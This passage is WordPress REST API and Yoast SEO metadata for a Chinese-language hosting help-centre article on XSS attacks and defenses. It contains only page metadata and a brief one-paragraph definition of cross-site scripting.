\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"isPartOf\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\"},\"datePublished\":\"2026-01-26T06:17:31+00:00\",\"dateModified\":\"2026-01-26T06:17:31+00:00\",\"author\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.wsisp.com\/helps\/66258.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/www.wsisp.com\/helps\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#website\",\"url\":\"https:\/\/www.wsisp.com\/helps\/\",\"name\":\"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3\",\"description\":\"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"zh-Hans\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"contentUrl\":\"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery\",\"caption\":\"admin\"},\"sameAs\":[\"http:\/\/wp.wsisp.com\"],\"url\":\"https:\/\/www.wsisp.com\/helps\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.wsisp.com\/helps\/66258.html","og_locale":"zh_CN","og_type":"article","og_title":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","og_description":"XSS\u653b\u51fb\u8be6\u89e3 1. XSS\u653b\u51fb\u6982\u8ff0 XSS&#xff08;Cross-Site Scripting&#xff0c;\u8de8\u7ad9\u811a\u672c\u653b\u51fb&#xff09; \u662f\u4e00\u79cd\u5c06\u6076\u610f\u811a\u672c\u6ce8\u5165\u5230\u53ef\u4fe1\u7f51\u7ad9\u4e2d\u7684\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728Web\u9875\u9762\u4e2d\u63d2\u5165\u6076\u610f\u811a\u672c&#xff0c;\u5f53\u5176\u4ed6\u7528\u6237\u6d4f\u89c8\u8be5\u9875\u9762\u65f6&#xff0c;\u811a\u672c\u4f1a\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u6267\u884c\u3002 \u5173\u952e\u7279\u5f81&#xff1a; \u653b\u51fb\u53d1\u751f\u5728\u7528\u6237\u6d4f\u89c8\u5668\u4e2d\u5229\u7528\u7f51\u7ad9\u5bf9\u7528\u6237\u8f93\u5165\u7684\u4fe1\u4efb\u7ed5\u8fc7\u540c\u6e90\u7b56\u7565&#xff08;SOP&#xff09;\u7684\u9650\u5236\u5f71\u54cd\u8303\u56f4\u5e7f\u6cdb&#xff1a;\u7a83\u53d6Co","og_url":"https:\/\/www.wsisp.com\/helps\/66258.html","og_site_name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","article_published_time":"2026-01-26T06:17:31+00:00","og_image":[{"url":"https:\/\/www.wsisp.com\/helps\/wp-content\/uploads\/2026\/01\/20260126061729-697706f9e43b5.webp"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"admin","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"4 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.wsisp.com\/helps\/66258.html","url":"https:\/\/www.wsisp.com\/helps\/66258.html","name":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86 - \u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","isPartOf":{"@id":"https:\/\/www.wsisp.com\/helps\/#website"},"datePublished":"2026-01-26T06:17:31+00:00","dateModified":"2026-01-26T06:17:31+00:00","author":{"@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41"},"breadcrumb":{"@id":"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.wsisp.com\/helps\/66258.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.wsisp.com\/helps\/66258.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/www.wsisp.com\/helps"},{"@type":"ListItem","position":2,"name":"Web\u5b89\u5168\u5fc5\u77e5\uff5cXSS\u653b\u51fb\u8be6\u89e3\uff1a\u4ece\u6f0f\u6d1e\u6316\u6398\u5230\u9632\u62a4\u5b9e\u6218\uff0c\u770b\u8fd9\u7bc7\u5c31\u591f\u4e86"}]},{"@type":"WebSite","@id":"https:\/\/www.wsisp.com\/helps\/#website","url":"https:\/\/www.wsisp.com\/helps\/","name":"\u7f51\u7855\u4e92\u8054\u5e2e\u52a9\u4e2d\u5fc3","description":"\u9999\u6e2f\u670d\u52a1\u5668_\u9999\u6e2f\u4e91\u670d\u52a1\u5668\u8d44\u8baf_\u670d\u52a1\u5668\u5e2e\u52a9\u6587\u6863_\u670d\u52a1\u5668\u6559\u7a0b","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.wsisp.com\/helps\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"zh-Hans"},{"@type":"Person","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/358e386c577a3ab51c4493330a20ad41","name":"admin","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/www.wsisp.com\/helps\/#\/schema\/person\/image\/","url":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","contentUrl":"https:\/\/gravatar.wp-china-yes.net\/avatar\/?s=96&d=mystery","caption":"admin"},"sameAs":["http:\/\/wp.wsisp.com"],"url":"https:\/\/www.wsisp.com\/helps\/author\/admin"}]}},"_links":{"self":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/66258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=66258"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/66258\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/66257"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=66258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=66258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=66258"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=66258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}